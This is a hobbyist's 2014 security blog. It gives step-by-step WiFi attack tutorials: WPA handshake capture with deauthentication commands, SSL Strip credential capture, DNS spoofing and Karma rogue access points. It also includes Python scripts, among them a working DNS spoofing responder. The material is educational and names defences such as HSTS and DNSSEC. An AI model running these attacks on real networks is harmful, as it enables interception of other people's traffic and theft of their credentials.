Friday, 3 October 2014

Capturing a WPA handshake.

So, latest update: I had an interview about a week ago and walked out of there feeling great. It looks like it paid off; I was offered the job and am just finalising the contracts now.

Let's get on to something more interesting than my boring life.
Without getting into too much WiFi theory: to get on to a WPA2 network by recovering its pre-shared key, the first step is to capture the WPA handshake.
This is the 4-way handshake between the AP and a device that is joining the network. The pre-shared key itself is never sent over the air; the two sides exchange nonces and a MIC that proves each holds the same key, and it is those values in the capture that let you test password guesses offline later.
I am not trying to teach WiFi theory here, just to pass on my process for capturing handshakes. As always, you should only be doing this to equipment you own or have permission to audit.

You have to start with a WiFi radio that supports packet injection and monitor mode. Offensive Security has a list of suggested hardware here for their WiFu course. aircrack-ng is available on Windows, but I prefer to use Kali Linux.

The first thing to do is to bring up a monitor interface; I also set a custom MAC address on it and take the wlan0 device down.

The next step is to run airodump-ng. I normally run this twice: the first time for reconnaissance, to get my target's ESSID, BSSID and channel.

For the attack run I use this command:
"airodump-ng --bssid 20:2B:C1:6B:D8:C5 -c 11 -w BTHub3-3M6H --output-format pcap mon0"
Let's break this down a little.
--bssid filters by the BSSID of the desired AP
-c locks mon0 on to the desired channel (you only capture the handshake if you are sitting on the AP's channel)
-w sets the capture file prefix; the output would be "/root/BTHub3-3M6H-01.cap" and the number at the end increments on each run
--output-format sets the format of the output file (pcap, so the capture goes straight into aircrack-ng or Wireshark)
Once this is running you will get a continuously updating display.


As you can see we have detected the AP and a client, in this case my iPhone. To capture the WPA handshake we need the client to authenticate again, so we de-authenticate it from the AP and let it reconnect.


One thing to be careful of at this stage is flooding with deauths: the -0 option takes a count, and 0 means keep sending forever. A flood exposes the attack, as you are actively transmitting, and a client that is kicked off repeatedly may stop reconnecting. With my method you send a single deauth round (-0 1), so you may need to rerun the command to catch the handshake. Two things have to be true for it to work: the client must be in range of your radio (the deauth has to reach it and you have to hear its reply), and airodump-ng must still be locked to the AP's channel. airodump-ng tells you when it has what it needs: "WPA handshake: 20:2B:C1:6B:D8:C5" appears in the top right of its display.


You have now captured a WPA handshake and can go on to break it using a variety of methods. Before you start cracking, check the file: running aircrack-ng BTHub3-3M6H-01.cap with no wordlist lists the networks in the capture and how many handshakes it found for each.

Here is my YouTube video to go along with this post.


Here is a list of every command used; items inside {} are variables that you need to set. On newer aircrack-ng releases airmon-ng names the monitor interface wlan0mon rather than mon0, so use whatever name it prints.

airmon-ng start {wifi interface}
ifconfig {wifi interface} down
ifconfig {monitor interface} down
macchanger -m {desired MAC address} {monitor interface}
ifconfig {monitor interface} up
airodump-ng {monitor interface}
airodump-ng --bssid {bssid} -c {channel} -w {title} --output-format pcap {monitor interface}
aireplay-ng -0 1 -a {bssid} -c {client MAC} {monitor interface}
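Once you have the .cap file, the check worth doing before throwing wordlists at it is whether the file actually holds enough of the exchange. The script below is an added example, not part of the original post and not aircrack-ng's own code: it walks the capture, picks out the EAPOL-Key frames, classifies each as message 1 to 4 from its Key Information flags, and reports per AP/client pair whether an offline attack has what it needs (message 2 for the SNonce and MIC, plus message 1 or 3 for the ANonce). It assumes a classic pcap with link type 105 (raw 802.11, which is what airodump-ng --output-format pcap writes) or 127 (radiotap); the sample capture at the bottom is constructed in memory with placeholder nonces and MICs.

```python
"""Check an airodump-ng .cap for a usable WPA/WPA2 4-way handshake.

Added example, not from the original post and not aircrack-ng's own code.
Assumes a classic pcap with link type 105 (raw 802.11) or 127 (radiotap) and
EAPOL frames without an HT control field. SAMPLE_CAPTURE is constructed in
memory with placeholder nonces and MICs; it is not a real handshake.
Usage: python3 check_handshake.py BTHub3-3M6H-01.cap
"""
import struct
import sys
from collections import defaultdict

LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP = 105, 127
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header, ethertype 0x888E
# EAPOL-Key "Key Information" bits
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def iter_pcap(data):
    """Yield (linktype, packet) for every record in a classic pcap file."""
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(struct.unpack_from("<I", data, 0)[0])
    if endian is None:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(endian + "IIII", data, off)[2]
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len

def eapol_key_from_frame(linktype, pkt):
    """Return (bssid, station, key_info, key_data_len) for an EAPOL-Key data frame, else None."""
    if linktype == LINKTYPE_RADIOTAP:
        pkt = pkt[struct.unpack_from("<H", pkt, 2)[0]:]      # skip the radiotap header by its length field
    elif linktype != LINKTYPE_IEEE802_11:
        return None
    if len(pkt) < 24:
        return None
    fc0, fc1 = pkt[0], pkt[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    if ftype != 2 or subtype & 0x4 or fc1 & 0x40:          # data frames only; skip null-data and protected frames
        return None
    hdr_len = 24 + (2 if subtype & 0x8 else 0)               # QoS data carries a 2-byte QoS control field
    to_ds, from_ds = fc1 & 0x1, fc1 & 0x2
    if from_ds and not to_ds:                                # AP -> station: addr1 = station, addr2 = BSSID
        bssid, sta = pkt[10:16], pkt[4:10]
    elif to_ds and not from_ds:                              # station -> AP: addr1 = BSSID, addr2 = station
        bssid, sta = pkt[4:10], pkt[10:16]
    else:
        return None
    body = pkt[hdr_len:]
    if not body.startswith(LLC_SNAP_EAPOL):
        return None
    eapol = body[8:]
    if len(eapol) < 99 or eapol[1] != 3:                     # EAPOL type 3 = EAPOL-Key; fixed key body is 95 bytes
        return None
    key_info, = struct.unpack_from(">H", eapol, 5)
    key_data_len, = struct.unpack_from(">H", eapol, 97)
    return mac(bssid), mac(sta), key_info, key_data_len

def classify(key_info, key_data_len):
    """Map Key Information flags to handshake message 1-4; None for group-key frames."""
    if not key_info & KI_PAIRWISE:
        return None
    ack, mic = bool(key_info & KI_ACK), bool(key_info & KI_MIC)
    if ack and not mic:
        return 1
    if ack and mic and key_info & KI_INSTALL:
        return 3
    if mic and not ack:                                      # M2 carries the RSN IE, M4 has empty key data
        return 4 if (key_info & KI_SECURE or key_data_len == 0) else 2
    return None

def handshakes(data):
    """Per (bssid, station): messages seen and whether an offline attack has what it needs."""
    seen = defaultdict(set)
    for linktype, pkt in iter_pcap(data):
        parsed = eapol_key_from_frame(linktype, pkt)
        if parsed is None:
            continue
        bssid, sta, key_info, key_data_len = parsed
        msg = classify(key_info, key_data_len)
        if msg:
            seen[(bssid, sta)].add(msg)
    # Cracking needs the SNonce and MIC from M2 plus the ANonce from M1 or M3.
    return {pair: {"messages": sorted(msgs), "crackable": 2 in msgs and (1 in msgs or 3 in msgs)}
            for pair, msgs in seen.items()}

# --- constructed sample capture: placeholder nonces/MIC, only the flags and framing are realistic ---
def build_eapol_key_frame(bssid, sta, msg):
    from_ap = msg in (1, 3)
    fc = b"\x08\x02" if from_ap else b"\x08\x01"             # data frame; FromDS or ToDS
    a1, a2 = (sta, bssid) if from_ap else (bssid, sta)
    header = fc + b"\x00\x00" + a1 + a2 + bssid + b"\x00\x00"
    key_info = {1: 0x008A, 2: 0x010A, 3: 0x13CA, 4: 0x030A}[msg]
    key_data = {1: b"", 2: b"\x30\x14" + b"\x00" * 20, 3: b"\xdd" * 56, 4: b""}[msg]
    key_body = (struct.pack(">BHHQ", 2, key_info, 16, msg) + bytes([msg]) * 32   # descriptor, info, key len, replay, nonce
                + b"\x00" * 48 + struct.pack(">H", len(key_data)) + key_data)     # IV, RSC, ID, MIC, key data
    return header + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(key_body)) + key_body

def build_pcap(frames, linktype=LINKTYPE_IEEE802_11):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1412332800 + i, 0, len(frame), len(frame)) + frame
    return out

AP, STA_OK, STA_PARTIAL = (bytes.fromhex(h) for h in ("020000000001", "020000000002", "020000000003"))
SAMPLE_CAPTURE = build_pcap([build_eapol_key_frame(AP, STA_OK, m) for m in (1, 2, 3, 4)]
                            + [build_eapol_key_frame(AP, STA_PARTIAL, 1)])  # second client never answered

if __name__ == "__main__":
    capture = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CAPTURE
    for (bssid, sta), info in handshakes(capture).items():
        print(f"{bssid} <-> {sta}: messages {info['messages']}, crackable={info['crackable']}")
```

The second client in the sample is the case the post warns about: a single deauth went out, message 1 was heard, but the client never came back, so the pair is reported as not crackable and the aireplay-ng command needs rerunning. Run it on a real capture by passing the .cap path; with no argument it runs against the built-in sample.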

Tuesday, 16 September 2014

Looks like I have been silent.

Well, hi. It looks like I have been neglecting my blog. In the last few months I have been given notice on my current contract; I have a few weeks left working at my current site and don't yet have a replacement. Good job I have some savings. I could take a long holiday and I would end up maybe making a few more posts, but is anyone even reading this?

So what have I been doing? Mostly studying for my MCSA on Server 2012, and guess what, I have passed. I'm now looking for infrastructure jobs, so here is hoping I can get a nice job in London.

I really do need to get my shit together: a new WiFi Pineapple firmware was released at DEFCON, which I once again missed. I'm really hoping to make the trip to Vegas next year. It's now 03:14 and I'm hoping to get something on here at the weekend. I'm currently studying for CCENT, so I am hoping that I will be able to do something along the network side of life.

Wednesday, 16 April 2014

Pineapple Firmware 1.3.0 Salmonosaurus & Evil Portal

Salmonosaurus

Well, the good people of Hak5 have gone and released another update for the Wi-Fi Pineapple.

So let's start with the details of the changelog.
Changelog:
Merged upstream changes
Updated wireless drivers.
Updated wireless utilities.
Updated OpenSSL (fixed heartbleed).
Updated some other base components.
Updated hostapd.
Improved WiFi Stability
More stable AP.
More stable clientmode.
Karma
Faster response times.
Cleaner, more concise log output.
Timestamps added to log
Much faster webinterface view of log
Removed the need to re-boot after initial set-up (first boot).
Added proper vFat support
Updated all system infusions to their latest versions
Security fixes.
Other minor fixes and improvements.
All of this can be found in the Hak5 forums.
I had no issues with the update and have had none since.

Evil Portal

To get started I would suggest watching Chris Haralson's how-to video on the captive portal; I have found his videos really helpful: http://youtu.be/nw4bo4rXGgQ.


After installing the infusion from the Pineapple Bar you will need to install its dependencies.
Once that is complete you can start moving forward.

The first tab details all of the configuration changes you will need to make, the next two configure the uHTTPd web server and NoDogSplash, and the last two are for editing and previewing the splash page.




The configuration changes made to uHTTPd and NoDogSplash are also covered in the video.
uHTTPd - change "list listen_http 0.0.0.0:80" to "list listen_http 0.0.0.0:8080". This moves the web server that serves the splash page off port 80, which NoDogSplash needs free to intercept clients' first HTTP request.
NoDogSplash - add to "FirewallRuleSet users-to-router":
"FirewallRule allow TCP port 8080"
"FirewallRule allow TCP port 1471"
These two rules let clients behind the portal reach the splash page (now on 8080) and the Pineapple's own interface (1471); without them NoDogSplash blocks that traffic to the router along with everything else.

At this point don't forget to restart uHTTPd before starting NoDogSplash.
This is where I have differed from Chris. Chris created a portal that worked as you would expect: you perform a particular action and you get access to the web. I just prefer to mess with people, or should I say myself, as doing this in the wild can be viewed as illegal. So my captive portal is just an ASCII art skull and crossbones that plays a creepy laugh, with no click-through.

One thing to point out is that you are limited by the internal storage space of the Pineapple. I was unable to get the creepy laugh working, but the main HTML page worked, so I was happy.
Remember that this should only be done on your own equipment or equipment that you have permission to work on.


Saturday, 8 March 2014

Windows 7 auto log in.


Well, after spending a lot of time on WiFi Pineapples, shall we head back to Windows 7?

Many of you may not remember computers pre Windows XP; we never had to log in to a system, it used to just start up ready for us.

My desktop doesn't travel around and I am the only person with access, so why should I have to type in my password to get access? Don't get me wrong, my laptop does travel and as a result has a password and full drive encryption.

It is the same case with my mother, but I don't want her having admin access to her computer; that would only make more work for me in the long run, as this is the second time I have had to reinstall a full OS for her.
The default log in account can be a standard user or an admin. Bear in mind that if a standard user attempts to access an admin feature they will be prompted for the admin's password (I installed TeamViewer for my Mum).

Less of my life; let's get into this nice quick tip.

Open the Run dialog by pressing the Windows key + R.

Type in "control userpasswords2", without the quotes, and press Enter.

In the dialog that opens, select the account that should log in automatically, untick "Users must enter a user name and password to use this computer", and click Apply.

At this point you will be prompted for that account's password.

After the next boot you will be delivered straight to your desktop.

Don't forget what your password is; you may still want to lock your computer when friends come around, or if you have set your computer to prompt for a password after recovering from the screensaver. Also bear in mind what this actually does: Windows keeps the password stored on the machine so that Winlogon can enter it for you, so anyone with admin rights on the box, or who can read the disk offline, can recover it. On an unencrypted desktop, automatic logon means physical access to the box is access to the account.


So I think the next one will have to be how to reset your password if you forget it.


WiFi Pineapple SSL Strip

SSL is used to secure traffic to websites. It was first used on banking and shopping websites; it is now used by Twitter, Facebook and even Google.

After the Firefox extension Firesheep received mainstream media coverage, pretty much all social media sites defaulted to HTTPS/SSL; previously most of these websites offered HTTPS as an option within the security settings, but most users did not know how to enable it or how important it was.
Now, SSL would protect you from a man in the middle attack like Firesheep (which simply read session cookies out of plain HTTP traffic), but SSL Strip is another MITM attack, and it targets the step before the secure connection exists. The proxy waits for the victim's first plain HTTP request, talks HTTPS to the real site itself, and rewrites every https:// link in the pages it relays to http://, so the browser never upgrades and the login form is posted in the clear. The defence on the website side is HSTS (the Strict-Transport-Security header): a browser that has seen it once refuses plain HTTP for that site, which is why the attack works far less often today than it did in 2014.

The first thing you should be doing is updating to the latest WiFi Pineapple firmware, version 1.1.0.
Flashing is very easy: just open the WiFi Pineapple MK5 large tile and check for upgrades. Flashing takes a few minutes, so you may have to put some time aside for this.

Getting started is easy: as with all the others, just click start in the small tile. You can look at the log file in the small tile, but I would suggest opening up the large tile.
I attempted to access Facebook and had a few problems getting the infusion to log any data, as the Chrome profile I was logged into was forcing me to use HTTPS, but it worked after logging out and manually typing in www.facebook.com.


I will be logging into Facebook with the account chump@facebook.com and the password "lamepassword".



Even though I prefer using the large tile interface, it turns out the small tile was best for demonstrating on here.
As you can see, this has reported a username and password.

You do have to pick it out, but on the 3rd line from the bottom you can see
"&email=chump%40facebook.com"
"&pass=lamepassword"

The reason the @ symbol is not displayed is percent-encoding, also called URL encoding.
I won't cover this in depth; basically, characters that have a reserved meaning in a URL or form body (@, &, =, /, space and so on) are replaced by a % followed by their byte value in hex, so @ becomes %40. If you have ever cut and pasted a URL and accidentally included a space you will have seen that space replaced with %20. For further reading please see the Wikipedia page here, and I also found a useful table here.
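To make the two halves of this concrete, here is an added example, not the sslstrip tool or the infusion's code: a function that does the link rewriting a stripping proxy performs on the HTML it relays, the re-upgrade the proxy does towards the real site, a decoder for the percent-encoded POST body that then appears in the log (turning %40 back into @ and + into a space), and a one-line model of why a browser with HSTS cached for the host never follows the downgraded link. The HTML fragment and POST body are constructed, using the chump@facebook.com account from the post.

```python
"""What an sslstrip-style proxy does to a page, and what its log then contains.

Added example; not sslstrip or the Pineapple infusion's code. SAMPLE_HTML and
SAMPLE_POST are constructed to match the shape of what the post describes.
"""
import re
from urllib.parse import parse_qs

HTTPS_LINK = re.compile(r"""https://([^\s"'<>]+)""")

def strip_https(html):
    """Rewrite every https:// URL to http:// and record the hosts that were downgraded."""
    stripped = set()

    def swap(match):
        stripped.add(match.group(1).split("/", 1)[0].lower())
        return "http://" + match.group(1)

    return HTTPS_LINK.sub(swap, html), stripped

def upstream_url(host, path, stripped):
    """The proxy speaks https to the real site for hosts it downgraded, so the site sees nothing odd."""
    scheme = "https" if host.lower() in stripped else "http"
    return f"{scheme}://{host}{path}"

def parse_login_post(body):
    """Decode an application/x-www-form-urlencoded body as it appears in the log (%40 -> @, + -> space)."""
    return {key: values[0] for key, values in parse_qs(body, keep_blank_values=True).items()}

def browser_would_downgrade(host, hsts_hosts):
    """A browser that has cached Strict-Transport-Security for the host will not follow the http:// link."""
    return host.lower() not in {h.lower() for h in hsts_hosts}

# Constructed: a login link and form as the real site would serve them over https.
SAMPLE_HTML = ('<a href="https://www.facebook.com/login.php">Log in</a>\n'
               '<form action="https://www.facebook.com/login.php" method="post">')
# Constructed: the body the victim's browser then posts over plain http through the proxy.
SAMPLE_POST = "lsd=AVo1&email=chump%40facebook.com&pass=lamepassword&login=Log+In"

if __name__ == "__main__":
    html, hosts = strip_https(SAMPLE_HTML)
    print(html)
    print("downgraded hosts:", sorted(hosts))
    print("proxy fetches from:", upstream_url("www.facebook.com", "/login.php", hosts))
    print("captured:", parse_login_post(SAMPLE_POST))
    print("HSTS cached, attack works:", browser_would_downgrade("www.facebook.com", ["www.facebook.com"]))
```

The decoded dictionary is exactly what you had to pick out of the small tile by eye. Note that nothing here touches the TLS connection itself: the attack only works because the browser's first request was plain HTTP and the site did not (in 2014) tell browsers to insist on HTTPS.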

Remember to keep safe and only exploit systems you have the correct authorisation for.

Wednesday, 19 February 2014

WiFi Pineapple Random Roll

WiFi Pineapple Random Roll

I'm not too sure if anyone out there is actually following this blog, but for the 1 or 2 of you out there: I have been away for a month or so after getting sick, and once I got better I had lost my motivation. This has now returned.

So let's start with Random Roll. This is a Pineapple Bar infusion; the free space required is 18954kb, so you will only be able to install it on to your SD card. Random Roll installs 7 "rolls" on to your system, including Nyan Cat, Peanut Butter Jelly Time and Circus Afro.


After installation you can decide to run one or several of the rolls on a random setting. Don't forget to start the service; I spent 15 minutes head scratching over this once.

Without any further configuration a user on the Pineapple's network will only be rolled if they attempt to access 172.16.42.1.

After configuring DNS Spoof you will be able to direct certain websites, or if you prefer all websites, to 172.16.42.1 and roll everyone.

As I said in my last post, if you misuse these tools you can land yourself in legal trouble; only use them when you have permission.

My next post will be on SSL Strip with the Pineapple, and hopefully by then I will have sorted out getting my YouTube account up and running; the first 2 videos will be on Karma, Random Roll and SSL Strip. Any suggestions or requests, please leave a comment or PM me.

Wi-Fi Pineapple DNS Spoof

DNSSpoof

Introduction

DNSSpoof allows your Pineapple to reroute requests for websites to a particular IP address.
So, dumbing it down again: when you type a website name into your browser, DNS is used to resolve the IP address of the web server hosting the website you are looking for. One example would be using the command prompt to ping a website.


In a Windows environment the first place that will be checked is
C:\Windows\System32\drivers\etc\hosts
If you are working within an enterprise environment you can edit this file to resolve a simple name for network devices that do not get published in DNS, like switches.


Editing the hosts file as shown will redirect requests for google.com.

A real world application: if I had a switch on my network called "switch1" with the IP address 10.0.0.3, I could edit my hosts file so that I do not have to keep track of the IP address, handy if you have many switches on an enterprise network.


 
So DNSSpoof will redirect any requests for a website to an IP that you decide.
 

Operation

DNSSpoof is available when you initially set up your Pineapple, so there are no infusions to install for this application. To state the obvious, you first have to enable DNSSpoof.
You can now redirect DNS requests to the pineapple or anywhere else you wish by editing the
If you replace the website name with an asterisk (*), all DNS requests will be redirected to your chosen IP address. Bear in mind that this only affects clients using the Pineapple as their resolver (which is what its DHCP hands out), and that only plain HTTP sites can be faked convincingly: a site the client expects over HTTPS will fail its certificate check when it lands on the Pineapple.
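To show what the infusion is doing on the wire, here is an added example, not the Pineapple's dnsspoof: a small responder that reads the same "IP hostname" lines the DNSSpoof configuration uses (with * as a wildcard), parses an incoming A query, and hands back a forged answer pointing at the chosen address while staying silent for everything else. The config, the query and the 172.16.42.1 default from the Random Roll post are the only inputs; the config lines are constructed.

```python
"""A tiny dnsspoof-style responder, as an added example (not the Pineapple's dnsspoof).

Reads "<ip> <hostname-pattern>" rules, answers matching A/IN queries with the
chosen IP, ignores the rest. A real dnsspoof sniffs on the LAN and races the
real resolver; here the client is assumed to be pointed straight at us.
SPOOF_CONFIG is constructed.
"""
import fnmatch
import socket
import struct

SPOOF_CONFIG = """
# constructed; same shape as the Pineapple's spoof host file
172.16.42.1 google.com
172.16.42.1 *.google.com
"""

def load_spoof_hosts(text):
    """Parse '<ip> <hostname-pattern>' lines; '*' is a wildcard and '#' starts a comment."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ip, pattern = line.split()
            rules.append((pattern.lower(), ip))
    return rules

def lookup(name, rules):
    """First matching rule wins; a bare '*' line redirects every name."""
    name = name.lower().rstrip(".")
    return next((ip for pattern, ip in rules if fnmatch.fnmatchcase(name, pattern)), None)

def parse_query(pkt):
    """Return (txid, qname, qtype, qclass, raw_question) from a single-question DNS query."""
    txid, _flags, qdcount = struct.unpack_from(">HHH", pkt, 0)
    if qdcount != 1:
        return None
    labels, off = [], 12
    while pkt[off] != 0:                                   # walk the length-prefixed labels
        length = pkt[off]
        labels.append(pkt[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    off += 1                                               # the terminating zero label
    qtype, qclass = struct.unpack_from(">HH", pkt, off)
    return txid, ".".join(labels), qtype, qclass, pkt[12:off + 4]

def build_response(query, rules):
    """Spoofed answer for an A/IN query that matches a rule; None means stay silent."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    txid, name, qtype, qclass, question = parsed
    ip = lookup(name, rules)
    if ip is None or qtype != 1 or qclass != 1:
        return None
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD, RA, NOERROR, one answer
    # name as a pointer to offset 12 (the question), type A, class IN, TTL 60, rdlength 4
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 60, 4) + socket.inet_aton(ip)
    return header + question + answer

def build_query(name, txid=0x1234):
    """An A/IN query as a client would send it; used for the offline demonstration."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"
    return struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack(">HH", 1, 1)

def answer_ip(response):
    """Pull the spoofed address out of a response built by build_response."""
    return socket.inet_ntoa(response[-4:])

def serve(rules, bind="172.16.42.1", port=53):
    """Answer live queries (needs root for port 53); the Pineapple's own address is the default."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            query, peer = sock.recvfrom(512)
            response = build_response(query, rules)
            if response:
                sock.sendto(response, peer)

if __name__ == "__main__":
    rules = load_spoof_hosts(SPOOF_CONFIG)
    for host in ("www.google.com", "example.org"):
        response = build_response(build_query(host), rules)
        print(host, "->", answer_ip(response) if response else "not spoofed, would be forwarded")
```

Swapping the two config lines for a single "172.16.42.1 *" line gives the catch-everything behaviour described above. Notice that the forged answer only works because the client has no way to tell a lie from the truth in plain DNS; that is the same gap DNSSEC exists to close.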
 
 
As always, stay safe and remember that it is only legal to do any of this on your own equipment or equipment that you have permission to work on. In the current climate even what we may view as minor mischief can be prosecuted. Please look forward to my next post, which will be on the Random Roll infusion.

Saturday, 11 January 2014

WiFi Pineapple and Karma.


Well, it would appear that this is the 2nd time I am writing this post, as I was a complete idiot and somehow managed to delete it while it was still in draft and could not recover the data, but it does mean that I get to watch some more Elementary.
Let's look at the WiFi Pineapple, a security auditing tool that exploits an inherent weakness in the way WiFi clients look for the open networks they have used before.
The WiFi Pineapple is produced by Hak5 and sold in the HakShop.
The WiFi Pineapple works as a router, though it is not to be confused with the Netgear or Linksys router in your house: the Pineapple has two wireless radios, one Ethernet port and one USB port.
So I received my WiFi Pineapple on Friday and have been in experiment mode ever since.
The Pineapple arrives completely blank but the latest firmware is included on a microSD card; the whole process is automated and provided you follow the included guide or watch the videos on Hak5 you should have no issues.
Applications that run on the Pineapple are called "infusions"; some are included and many more are online in the Pineapple Bar.
The particular application I want to talk about is Karma.
I won't be going in depth on the theory as this has been covered many times on Hak5.
When your laptop or phone comes online it sends out probe requests looking for networks it has joined previously, naming each one. Karma answers those probes as if it were that network, so a device looking for an open network it remembers will happily associate with the Pineapple instead. The list of remembered networks can be found on a Windows PC by clicking the "Manage Wireless Networks" link within the Network and Sharing Center.
The best way to access Karma is through the Pineapple web interface.



Let's state the obvious: click "Start" and Karma will start. Clicking "Enable" will not start Karma now but will start it automatically the next time the Pineapple reboots, handy if you don't want to get your laptop out and log into the Pineapple. Clicking on "Karma" opens the Karma interface, which has three pages: Karma Intelligence Report, Karma Log and Karma Configuration.
 
Karma Intelligence displays the MAC address, assigned IP address, hostname and the assumed SSID. I have edited the hostnames and MAC addresses to protect myself and the stupid person that connected while I was taking screenshots (the first time I managed to pick anyone else up).


 
Karma Log holds information on all probe requests received and all clients that have connected.

 
And finally Karma Configuration is where you can set the broadcast SSID of the Pineapple, Client Blacklisting, where you list clients the Pineapple will not respond to, and SSID Black/White Listings, where you configure which SSIDs the Pineapple will respond as.
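For anyone who wants to see what those configuration pages control at the frame level, here is an added example, not Hak5's Karma code: it parses a raw 802.11 probe request to get the probing client's MAC and the SSID it is asking for, records the probe the way the Karma Log does, and applies the client blacklist, SSID blacklist and SSID whitelist to decide which SSID the Pineapple should answer as. The frames and MAC addresses are constructed.

```python
"""Karma-style handling of probe requests, as an added example (not Hak5's Karma code).

A client that remembers a network sends probe requests naming its SSID. Karma
answers as that network. Below: parse the probe, log it, apply the three
controls from the Karma Configuration page. Frames and MACs are constructed.
"""
import struct

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_probe_request(frame):
    """Return (client_mac, requested_ssid) for a raw 802.11 probe request, else None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 3 != 0 or fc0 >> 4 != 4:        # management frame (type 0), subtype 4 = probe request
        return None
    client = mac(frame[10:16])                        # addr2 is the transmitter, i.e. the probing client
    ssid, off = "", 24                                # probe requests have no fixed fields: IEs start at 24
    while off + 2 <= len(frame):
        eid, length = frame[off], frame[off + 1]
        if eid == 0:                                  # element 0 = SSID; empty means a broadcast (wildcard) probe
            ssid = frame[off + 2:off + 2 + length].decode("utf-8", "replace")
            break
        off += 2 + length
    return client, ssid

class Karma:
    def __init__(self, client_blacklist=(), ssid_blacklist=(), ssid_whitelist=()):
        self.client_blacklist = {m.lower() for m in client_blacklist}
        self.ssid_blacklist = set(ssid_blacklist)
        self.ssid_whitelist = set(ssid_whitelist)     # empty whitelist = answer any SSID that is not blacklisted
        self.log = []                                 # (client, ssid) for every probe heard, like the Karma Log page

    def respond_as(self, frame):
        """SSID to impersonate in the probe response, or None to stay silent."""
        parsed = parse_probe_request(frame)
        if parsed is None:
            return None
        client, ssid = parsed
        self.log.append((client, ssid))
        if not ssid:                                  # wildcard probe: nothing specific to pretend to be
            return None
        if client in self.client_blacklist:
            return None
        if self.ssid_whitelist and ssid not in self.ssid_whitelist:
            return None
        if ssid in self.ssid_blacklist:
            return None
        return ssid

def build_probe_request(client, ssid):
    """Constructed probe request: broadcast DA and BSSID, the client as SA, then SSID and rates IEs."""
    header = (b"\x40\x00" + b"\x00\x00" + b"\xff" * 6                            # FC mgmt/probe req, duration, addr1
              + bytes.fromhex(client.replace(":", "")) + b"\xff" * 6 + b"\x00\x00")  # addr2 = client, addr3, seq ctl
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
    return header + ssid_ie + rates_ie

if __name__ == "__main__":
    karma = Karma(client_blacklist=["02:00:00:00:00:99"], ssid_blacklist=["CorpWiFi"])
    for client, ssid in [("02:00:00:00:00:01", "CoffeeShopFree"), ("02:00:00:00:00:01", "CorpWiFi"),
                         ("02:00:00:00:00:99", "CoffeeShopFree"), ("02:00:00:00:00:01", "")]:
        print(client, repr(ssid), "->", karma.respond_as(build_probe_request(client, ssid)))
```

The empty-SSID case is the one that matters for defence: a device that has forgotten its open networks only sends wildcard probes, and Karma has nothing to impersonate. The blacklist exists for the same reason the post keeps repeating: keep your own and any non-consenting devices out of the test.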
 
So in conclusion, the WiFi Pineapple can make you a man in the middle: you can be the one that people connect to for internet access. And how can you protect yourself from this kind of attack? Don't connect to unsecured networks, and if you do, don't allow that network to connect automatically; forget it afterwards so your device stops probing for it. Always make sure you know what you are connecting to.

Friday, 10 January 2014

New arrivals.

I have received my USB Rubber Ducky and WiFi Pineapple today.
Thanks Hak5 for the holiday sales.


The next few instalments will be featuring the WiFi Pineapple so please keep an eye out over the next few weeks.

Thursday, 9 January 2014

Beginning

Well where to start?

I'm Mat the Grinch and have been working in the IT/Comms industry for 13 years now. Being that I am at the grand old age of 30 and have not even attempted to sidestep into another industry by now, I am probably in here for life, not that that is a bad thing.

So I currently work as an IT contractor; my current position is network monitoring, which is cool apart from the fact that every day is 12 hours long, and when you get to day 4 it is a long day. Realistically I probably spend around 15 hours a day at a computer, and as a result I have quite a few IT tips and tricks that I am going to try to share with you.


So this week we will be making a custom login screen for Windows 7. Yes, Windows 7, not 8; I think you know why.




Now the tricky bit: navigate to this key in the registry using regedit.
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
Change the value of OEMBackground to 1 (create it as a DWORD if it is not there).



Next we need a picture that is no larger than 256kb.
Name the file backgroundDefault.jpg.
Place the JPEG in the folder "C:\Windows\System32\oobe\info\backgrounds"; if the backgrounds folder is not there, just create it.
There is no need to reboot: just press Windows + L to lock and you now have a customised log on screen.

Well, as I am sitting here at 0900 in the morning after working a 12 hour night shift, I may as well tell you what the plan is for my next post.
Fun with a WiFi Pineapple - I am actually staying up this morning awaiting my delivery of a Mark V pineapple so you can expect some Pinappley goodness pretty soon.

If you would like to find out more about the WiFi Pineapple please check out Hak5 on youtube.

That's all for today any feedback is always welcome.